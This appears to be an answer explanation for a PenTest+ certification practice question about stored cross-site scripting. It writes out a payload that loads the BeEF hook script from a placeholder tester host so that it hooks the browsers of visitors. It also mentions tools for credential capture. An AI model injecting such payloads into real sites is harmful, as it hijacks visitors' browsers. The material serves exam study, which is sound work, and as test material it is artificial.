The correct answer is B. Use BeEF and insert payload < script src= " http:// < tester-IP > :3000/hook.js " >
BeEF, the Browser Exploitation Framework, is specifically designed to exploit client-side browser vulnerabilities and control browsers that load a malicious JavaScript hook. In a stored XSS scenario, inserting the BeEF hook script into a vulnerable comment form causes any user who views the comment to load the attacker-controlled JavaScript.
The payload:
< script src= " http:// < tester-IP > :3000/hook.js " >
loads BeEF’s hook script from the tester’s system. Once the victim browser executes the script, the browser becomes “hooked,” allowing the tester to perform browser-based post-exploitation actions within the authorized scope of the engagement.
A is incorrect because Evilginx is mainly used for adversary-in-the-middle phishing and credential/session capture, not for controlling browsers through stored XSS.
C is incorrect because a Netcat listener and an iframe pointing to /bin/bash will not create a browser reverse shell. Browsers cannot execute /bin/bash on the victim host simply through an iframe.
D is incorrect because the listed Metasploit module and image tag do not represent the standard method for hooking browsers through stored XSS.
In PenTest+ terms, this falls under Attacks and Exploits, specifically stored cross-site scripting and browser exploitation using JavaScript-based payloads.
